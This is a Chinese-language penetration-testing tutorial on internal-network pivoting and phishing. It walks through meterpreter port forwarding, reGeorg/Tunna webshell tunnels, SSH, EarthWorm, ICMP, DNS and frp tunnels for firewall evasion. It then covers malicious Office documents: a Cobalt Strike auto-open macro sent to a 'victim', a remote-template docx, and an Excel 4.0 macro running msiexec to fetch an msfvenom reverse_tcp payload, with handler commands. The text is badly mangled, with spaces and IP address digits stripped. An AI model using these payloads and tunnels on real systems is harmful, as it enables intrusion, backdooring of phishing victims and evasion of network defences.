作。kaliBmeterpertersocks4代理通過(guò)在A服務(wù)proxychainsDC80端口。DC的時(shí)候?qū)嶋H上是DA1080端口C80burpsuite無(wú)法再使用瀏覽bursuiteburpsuite代Aburpsuitesocks4burpsuitekaliB服務(wù)器C80端口整個(gè)流程如圖kalimsfsock4aproxychains1080那就可proxychainsnmapc80SocksCap設(shè)置socks4a代理那么就可以用sockscap代理訪問(wèn)C的80端口SocksCap啟用系統(tǒng)代理默認(rèn)的端口是25378在burpsuite設(shè)置上游代理選項(xiàng)卡user_options打開(kāi)瀏覽器訪問(wèn)c的80端口開(kāi)啟burpsuite進(jìn)行攔截，即可獲取包MetasploitPortfwd（端口轉(zhuǎn)發(fā)/重定向）Meterpretershellportfwd（或系統(tǒng)的受損主機(jī)上運(yùn)行此命TCP連接，從而使其成為一個(gè)支點(diǎn)。就像使sshpotdCPmeterpreter>portfwd-hUsage:portfwd[-h][add|delete|list|flush][args]OPTIONS:-Lopt> 要監(jiān)聽(tīng)的本地主機(jī)（可選）。-h 幫助橫幅。-lopt> 要監(jiān)聽(tīng)的本地端口。-popt> 要連接的遠(yuǎn)程端口-ropt> 要連接的遠(yuǎn)程主機(jī)portfwdadd–l3389–p3389–r42B3389A3389kailA3389B3389rdesktop:3389Neo-reGeorgAB80端口獲取一個(gè)系統(tǒng)權(quán)限，C數(shù)據(jù)庫(kù)服務(wù)器BBAC的CreGeorgreGeorg/L-codes/Neo-reGeorg使用方法輸入密碼生成加密腳本python3neoreg.pygenerate-kmoonsecmoonsec是生成的密碼生成的腳本是免殺的把生成的腳本上傳到b服務(wù)器上，b服務(wù)器支持aspx在A執(zhí)行命令python3neoreg.py-kmoonsec-u42/tunnel.aspx設(shè)置獲取火狐代理1080訪問(wèn)55如有用nmap掃描C的端口還可以設(shè)置proxychains修改/etc/proxychains.conf增加socks51080Proxychainsnmap-sT-Pn55-p80SSHSSHSSH客戶端與服務(wù)端之間的網(wǎng)絡(luò)數(shù)據(jù)。但是，SSHTCPSSH鏈接來(lái)轉(zhuǎn)發(fā)，并且自動(dòng)提供TCPSMTP，LDAPTCP應(yīng)用均能夠從中得益，避免了用戶名，密碼以及隱私SSHTCPSSH進(jìn)行通訊。SSH端口轉(zhuǎn)發(fā)的兩大功能加密SSHClient端至SSHServer端之間的通訊數(shù)據(jù)。突破防火墻的限制，完成一些之前無(wú)法建立的TCP連接。SSH本地socks5代理ssh-qTfnN-D7070root@54-C-f參數(shù)，把ssh放到后臺(tái)運(yùn)行。瀏覽器設(shè)置socks5代理即可訪問(wèn)外網(wǎng)如谷歌SSH本地轉(zhuǎn)發(fā)正向連接命令：-Llocalport:remotehost:remotehostportsshserver說(shuō)明:localport 本機(jī)開(kāi)啟的端口號(hào)remotehost IP地址remotehostport 轉(zhuǎn)發(fā)機(jī)器的端口號(hào)sshserver IP地址選項(xiàng)：-f后臺(tái)啟用-Nshell，處于等待狀態(tài)（不加-N則直接登錄進(jìn)去）-g應(yīng)用場(chǎng)景一某企業(yè)要求A訪問(wèn)內(nèi)部網(wǎng)絡(luò)的C服務(wù)器的80端口A與b能互通，B與C能互通，A與C不能通信。C不能出網(wǎng)。ABC80WEBsshipAbC。方法在A服務(wù)器上執(zhí)行sshL本地端口:IP:moonsec@39ssh-L6666:55:80moonsec@39-fN常見(jiàn)環(huán)境應(yīng)用二把目標(biāo)的端口轉(zhuǎn)發(fā)出來(lái)例如mysql服務(wù)器只允許本地訪問(wèn)在外部不能訪問(wèn)。這就很好地保護(hù)了mysql免受外部攻擊。ssh-L3306:localhost:3306moonsec@39-fN轉(zhuǎn)發(fā)后Navicat訪問(wèn)本地3306端口提示連接成功ssh遠(yuǎn)程轉(zhuǎn)發(fā)命令：-Rsshserverport:remotehost:remotehostportsshserver說(shuō)明：sshserverport 被轉(zhuǎn)發(fā)機(jī)器開(kāi)啟的端口號(hào)remotehost IP地址remotehostport 被轉(zhuǎn)發(fā)機(jī)器的端口號(hào)sshserver IP地址好用。以下是一個(gè)很經(jīng)典的案例。A可以與B互通B與C可以互相A與C不能通信。AC80BBC330680端口通過(guò)。這就用到SSH隧道遠(yuǎn)程轉(zhuǎn)發(fā)首先修改/etc/ssh/sshd_configGatewayPortsyes如果沒(méi)有請(qǐng)?jiān)黾尤绻?qǐng)把no修改yes這個(gè)配置的作用是遠(yuǎn)程轉(zhuǎn)發(fā)后將改為A通過(guò)指定端口就能訪問(wèn)C遠(yuǎn)程轉(zhuǎn)發(fā)命令在C服務(wù)器上執(zhí)行ssh-R本地端口:遠(yuǎn)程ip:遠(yuǎn)程端口ssh服務(wù)器ssh-R8877:57:80moosec@47或者ssh-R8877:57:80moosec@47-fN前者是可以登錄可以操作shell看需求選擇合適的A訪問(wèn)B的8877端口即可訪問(wèn)C的80端口Earthworm(EWSocks5EW是一套便攜式的網(wǎng)絡(luò)穿透工具，具有SOCKSv5服務(wù)架設(shè)和端口轉(zhuǎn)發(fā)兩大核心功能，可在復(fù)雜網(wǎng)絡(luò)環(huán)境下完成網(wǎng)絡(luò)穿透。達(dá)網(wǎng)絡(luò)深處。目前該工具永久停止更新。工具支持多個(gè)平臺(tái)工具的穿透模式分為正向代理和反向代理a與b互通b與c互通a與c不互通a獲取b的權(quán)限后在b設(shè)置代理訪問(wèn)C的80端口那么A就能訪問(wèn)C在b里執(zhí)行ew_for_Win.exe-sssocksd-l8888然后設(shè)置/etc/proxychains.conf增加socks5398080ew反向代理反向代理的好處是突破防火墻從內(nèi)部連接外部在b上執(zhí)行ew_for_linux64-srcsocks-l1080-e1024在c上執(zhí)行ew_for_Win.exe-srssocks-d53-e1024在/etc/proxychins.conf增加socks5391080用nmap測(cè)試5080端口proxychinsnmap-Pn-sT55-p80TunnaHTTPTunna可以封裝和隧道化HTTP上的任何TCP通信。它可以用來(lái)繞過(guò)防火墻環(huán)境中的網(wǎng)絡(luò)限制。使用pythonproxy.py-u-l[options]選項(xiàng)--help,-h顯示幫助消息并退出。--url=URL,-uURL遠(yuǎn)程webshell--lport=LOCAL_PORT,-lLOCAL_PORT本地監(jiān)聽(tīng)端口--verbose,-v輸出數(shù)據(jù)包大小--buffer=BUFFERSIZE,-bBUFFERSIZE*HTTP請(qǐng)求大小(一些webshels對(duì)大小有限制)沒(méi)有SOCKS代理的選擇，如果使用SOCKS代理，則忽略此選項(xiàng)--no-socks,-n不用SOCKS代理--rport=REMOTE_PORTrREMOTE_PORTwebshell服務(wù)的遠(yuǎn)程端口--addr=REMOTE_IPaREMOTE_IPwebshell（）Tunna代理遠(yuǎn)Tunnaweb服務(wù)還算穩(wěn)定。項(xiàng)目地址/SECFORCE/Tunna場(chǎng)景應(yīng)用Ab互通bc互通AcA已經(jīng)拿下B的權(quán)限，通過(guò)在b設(shè)置代理在訪問(wèn)C3389端口。這種代理屬于正向代理。使用Tunna工具b的網(wǎng)站上傳conn.aspx一定要支持腳本運(yùn)行。在A執(zhí)行python2proxy.py-u39/conn.aspx-l4321-a55-r3389–vA開(kāi)啟新的終端輸入rdesktop:4321即可訪問(wèn)C3389端口ICMPICMP在一些網(wǎng)絡(luò)環(huán)境中，如果不經(jīng)過(guò)認(rèn)證，TCPUDP數(shù)據(jù)包都會(huì)被攔截。如果用戶ping通遠(yuǎn)程計(jì)算機(jī)，就可以嘗試建立ICMPTCP數(shù)據(jù)通過(guò)該隧道發(fā)送，實(shí)現(xiàn)不受限的網(wǎng)絡(luò)訪問(wèn)。用戶需要在受限制網(wǎng)絡(luò)之外，預(yù)先啟動(dòng)該工具建立代理服務(wù)器。再以客戶端模式運(yùn)行該工具，就可以建立ICMP隧道。為了避免該隧道被濫用，用戶還可以為隧道設(shè)置使用密碼。一、icmptunnel可以將IP流量封裝進(jìn)IMCP的ping數(shù)據(jù)包中，旨在利用ping穿透防火墻的檢測(cè)，因?yàn)橥ǔ７阑饓κ遣粫?huì)屏蔽ping數(shù)據(jù)包的。二、請(qǐng)求端的Ping工具會(huì)在ICMP數(shù)據(jù)包后面附加上一段隨機(jī)的數(shù)據(jù)作為Payload，而響應(yīng)端則會(huì)拷貝這段Payload到ICMP響應(yīng)數(shù)據(jù)包中返還給請(qǐng)求端，用于識(shí)別和匹配Ping請(qǐng)求。三、在使用ptunnel進(jìn)行內(nèi)網(wǎng)穿透時(shí)，客戶端會(huì)將IP幀封裝在ICMP請(qǐng)求數(shù)據(jù)包中發(fā)送給服務(wù)器，而服務(wù)器端則會(huì)使用相匹配的ICMP響應(yīng)數(shù)據(jù)包進(jìn)行回復(fù)。這樣在旁人看來(lái)，網(wǎng)絡(luò)中傳播的僅僅只是正常的ICMP數(shù)據(jù)包。應(yīng)用場(chǎng)景ab能互通bc能互通ac之間有防護(hù)墻攔截禁用TCP協(xié)議但是Apingc由此判斷防火墻沒(méi)有對(duì)icmp協(xié)議進(jìn)行封禁。故可以用imcp隧道技術(shù)。b上執(zhí)行ptunnel-x12341234是密碼A上執(zhí)行ptunnel-p37-lp8080-da44-dp80-x1234-p接目的地址即跳板主機(jī)的地址-lp即localport本地端口-da我們要連接的地址-dp他的端口-x是密碼Ahttp://localhsot:8080即可訪問(wèn)C80端口封禁tcp協(xié)議iptables-AINPUT-ptcp-s43-jDROP啟動(dòng)80端口python-mhttp.server80DNSDNSDNS協(xié)議中傳輸建DNS是一個(gè)必不可少的服務(wù)，所以大部分防火墻和入侵檢測(cè)設(shè)備很少會(huì)過(guò)濾DNSDNSDNSTunnelingAPT攻擊中扮演著重要的角色。dns2tcpDNSTCPKEYTXT類型的C語(yǔ)言開(kāi)發(fā)。它分為兩個(gè)部分，服務(wù)端和客戶端，服務(wù)端運(yùn)行在linuxlinuxwindows上(其他平臺(tái)沒(méi)有測(cè)試過(guò))，編譯完成后在服務(wù)端上的可執(zhí)行文件名稱為dns2tcpd，在客戶端(linux)上的名稱為dns2tcpc，kali默認(rèn)安裝了二者。下述為主要參數(shù)及解釋，詳情請(qǐng)參考手冊(cè)。應(yīng)用場(chǎng)景cbcDNS53端口進(jìn)行封鎖，允許開(kāi)53dns隧道。dns2tcpd-F 強(qiáng)制在在臺(tái)運(yùn)行，默認(rèn)在后臺(tái)-iIPaddress監(jiān)聽(tīng)ip，默認(rèn)-f配置文件指定使用的配置文件路徑-ddebuglevel指定調(diào)試級(jí)別，輸出相關(guān)級(jí)別日志，默認(rèn)為1，2，3dns2tcpc-c :啟用壓縮-zdomain> :指定所使用的域名-d1|2|3> :調(diào)試級(jí)別(1,2or3)-r<resource> :訪問(wèn)的目標(biāo)資源-f<filename> :配置文件路徑-lport|-> :本地監(jiān)聽(tīng)端口-T<TXT|KEY> :DNSTXT配置文件下：listen=port=53user=nobodychroot=/tmpdomain=<>resources=ssh::22,socks::1082,http::3128vpsudp53ubuntu18.04x64設(shè)置域名信息a記錄指向vpsipns記錄指向vpsBdns2tcpsudoapt-getinstall修改配置文件sudovi/etc/dns2tcpd.conflisten=port=53#Ifyouchangethisvalue,alsochangetheUSERvariablein/etc/default/dns2tcpduser=rootkey=moonsecchroot=/tmpdomain=resources=ssh::22,smtp::25解釋允許任何訪問(wèn)listen=設(shè)置用戶user=root設(shè)置密碼key=moonsec在b終端執(zhí)行啟動(dòng)dns2tcpd-f/etc/dns2tcpd.conf-F-d3如果出現(xiàn)錯(cuò)誤可能端口被判斷idkill結(jié)束進(jìn)程netstat-anp|grep53kill進(jìn)程號(hào)阿里云默認(rèn)的服務(wù)關(guān)閉systemctlstopsystemd-resolved在c下載客戶端執(zhí)行dns2tcpc-rssh-kmoonsec-z54-l8888-c-d3在c執(zhí)行命令sshroot@-p8888也用xshell代替登錄c8888B22ssh端口轉(zhuǎn)發(fā)再用proxifier代理Dns隧道數(shù)據(jù)包不過(guò)訪問(wèn)數(shù)據(jù)很慢frpfrptcp,udphttp和https應(yīng)用協(xié)議提供了額外的能力，且嘗試性支持了點(diǎn)對(duì)點(diǎn)穿透。詳細(xì)說(shuō)明/fatedier/frp/blob/master/README_zh.md下載地址/fatedier/frp/releasesfrp的作用利用處于內(nèi)網(wǎng)或防火墻后的機(jī)器，對(duì)外網(wǎng)環(huán)境提供http或httpshttp,https80和udp服務(wù)，例如在家里通過(guò)ssh訪問(wèn)處于公司內(nèi)網(wǎng)環(huán)境內(nèi)的主機(jī)。frp支持的平臺(tái)darwinlinux386amd64armmipsmips64mips64lemipslewindows386amd64常用場(chǎng)景C80WEBC80B8000A8000C80WEBC2222ABCSSHC測(cè)試環(huán)境Bvps系統(tǒng)ubuntu18.04A與BFrp分為服務(wù)端和客戶端frps服務(wù)端為linux 負(fù)責(zé)處理請(qǐng)求，轉(zhuǎn)發(fā)流量Frpclinuxwindows再某云購(gòu)買vps要修改規(guī)則frps配置服務(wù)器端在vps上下載軟件配置服務(wù)端wget/fatedier/frp/releases/download/v0.33.0/frp_0.33.0_linux_amd64.tar.gz解壓tarzxvffrp_0.33.0_linux_amd64.tar.gz重命名mvzxvffrp_0.33.0_linux_amd64frp進(jìn)入目錄cdfrp刪除客戶端文件rm-rffrpc*配置服務(wù)端文件frps.ini[common]bind_port=7000token=moonsec2020bind_port客戶端連接的端口token密碼一定設(shè)置復(fù)雜運(yùn)行./frps-cfrps.ini運(yùn)行正常即可設(shè)置開(kāi)機(jī)啟動(dòng)vi/lib/systemd/system/frps.service[Unit]Description=frapsserviceAfter=network.targetsyslog.targetWants=network.target[Service]Type=simple#啟動(dòng)服務(wù)的命令（frpsExecStart=/root/frp/frps-c/root/frp/frps.ini[Install]WantedBy=multi-user.target#啟動(dòng)frpcsystemctlsystemctlstartfrps#設(shè)置為開(kāi)機(jī)啟動(dòng)systemctlenable以上服務(wù)端配置完畢，frps7000psauxnetstatantlfrpc配置客戶端下載對(duì)應(yīng)系統(tǒng)版本的frpc配置客戶端信息[common]server_addr=54server_port=7000token=moonsec2020[ssh]type=tcplocal_ip=local_port=22remote_port=6000[web]type=tcplocal_ip=local_port=80remote_port=8000說(shuō)明server_addr=54#服務(wù)器的IPserver_port=7000#服務(wù)器的端口token=moonsec2020#連接的密碼[web]#服務(wù)器名typetcp連接協(xié)議類型local_ip#ip可以是內(nèi)網(wǎng)任何一個(gè)local_port80#本地端口remote_port=8000#遠(yuǎn)程服務(wù)器的ip啟動(dòng)frpc.exe-cfrpc.ini通信正常后用瀏覽器訪問(wèn)整個(gè)流程就是客戶端與服務(wù)器端建立通信后，當(dāng)A訪問(wèn)B的的8000端口后，B收到請(qǐng)求對(duì)流量進(jìn)行轉(zhuǎn)發(fā)，那么A就能訪問(wèn)到C。網(wǎng)絡(luò)釣魚(yú)篇APT攻擊、勒索軟件攻擊等事件中，扮演了重要的角色。OfficeOfficeMacroOffice自帶的一種高級(jí)腳本特性，通VBAOfficeNormal模板上。BasicforApplications（VBA）Basic的一種宏語(yǔ)言，是微軟開(kāi)發(fā)出來(lái)在其桌面應(yīng)用程序中執(zhí)行通用的自動(dòng)化(OLE)任務(wù)的編程語(yǔ)言。主要能用來(lái)WindowsMicrosoftOffice軟件，也可說(shuō)是一種應(yīng)Basic腳本。測(cè)試環(huán)境系統(tǒng)windows10x64word版本2016cobaltstrike4.0cobalt生成宏Attacks->Packages->MSOfficeMacro選擇好設(shè)置的監(jiān)聽(tīng)器后復(fù)制宏代碼創(chuàng)建宏創(chuàng)建docx文件選擇自定義功能區(qū)把開(kāi)發(fā)工具勾上點(diǎn)擊開(kāi)發(fā)工具創(chuàng)建宏填寫(xiě)名字宏的位置在當(dāng)前文件名。auto_open自動(dòng)打開(kāi)保存文件提示選擇否另存為dotm文件至此一個(gè)簡(jiǎn)單的宏文件完成。測(cè)試宏文件將文件發(fā)送給受害者，如果受害者打開(kāi)。提示宏被禁用如果用戶點(diǎn)擊啟動(dòng)內(nèi)容。Cobaltstrike就會(huì)獲得受害人的beacon可以看到受害者已經(jīng)中了后門(mén)，可以對(duì)用戶進(jìn)行其他方面的操作。DOCX釣魚(yú)攻擊時(shí)，您可以將.docx的文檔直接附加到電子郵件中，并且您不太可能根據(jù)文件的拓展名去阻止它。文檔加載附加word載模板執(zhí)行惡意模板的宏。檢測(cè)?；蚴?dotmVBA.docx文件，它本身不包含惡意代碼，只有指向惡意模板文件的目標(biāo)鏈接。創(chuàng)建dotm文件這個(gè)跟上面的創(chuàng)建方法差不多新建文件docx文件選擇VIsualBasic雙擊ThisDocumen復(fù)制cobaltstrike惡意代碼到模板里保存另存為dotm文件將dotm文件放到遠(yuǎn)程的服務(wù)器上創(chuàng)建遠(yuǎn)程模板加載文檔打開(kāi)word后選擇好模板文件保存即可docxzip再解壓接著修改word\_rels\settings.xml.rels里的Target改成dotm文件的訪問(wèn)網(wǎng)址壓縮之后，將后輟zip改成docx執(zhí)行測(cè)試當(dāng)受害人執(zhí)行docx文件是會(huì)從遠(yuǎn)程加載的宏文件docx且隱蔽。Excel4.0Excel一般指MicrosoftOfficeExcelMicrosoftExcel是Microsoft為使用WindowsAppleMacintosh操作系統(tǒng)的電腦編寫(xiě)的一款電子表格軟件。直觀的界面、出Excel成為最流行的個(gè)人officeExcelExcel文件里的宏就會(huì)被觸發(fā)。測(cè)試環(huán)境windows10x64excel2016metasplosit生成msi文件msfvenom-pwindows/meterpreter/reverse_tcplhost=80lport=1234-fmsi-ohack.msi將生成好的hack.msi放到遠(yuǎn)程的服務(wù)器上監(jiān)聽(tīng)器useexploit/multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetlhost80setlport1234exploit-j打開(kāi)excel底部右鍵插入宏表=EXEC("msiexec/q/i80/hack.msi")=HALT()Auto_Open文檔被打開(kāi)時(shí)，自動(dòng)運(yùn)行宏。設(shè)置隱藏保存否保存為保存為xlsm當(dāng)把文件發(fā)送給受害者受害人右鍵打開(kāi)文件時(shí)就會(huì)自動(dòng)運(yùn)行宏。允許宏執(zhí)行宏會(huì)惡意請(qǐng)求遠(yuǎn)程服務(wù)器msi文件自動(dòng)下載運(yùn)行。CHMCHM（CompiledHelpManual）即“已編譯的幫助文件”。它是微軟新一代HTML作源文，把幫助內(nèi)容以類似數(shù)據(jù)庫(kù)的形式編譯儲(chǔ)CHM支持JavascriptVBscriptActiveXJavaAppletFlashJPEGPNG)(MIDURLInternetChm文件因何變得危險(xiǎn).Chm文件格式是HTML文件格式的擴(kuò)展，它本來(lái)是一種用于給軟件應(yīng)用程序作用戶手冊(cè)的特殊文本格式。簡(jiǎn)單來(lái)說(shuō)，HTML文件格式被壓縮和重整以后，就被制成了這種二進(jìn)制的.Chm擴(kuò)展文件格式。通常，.Chm文件格式由壓縮的HTML文件、圖像、Javascript這些文件組合而成，同時(shí)，它可能還帶有超鏈接目錄、索引以及全文檢索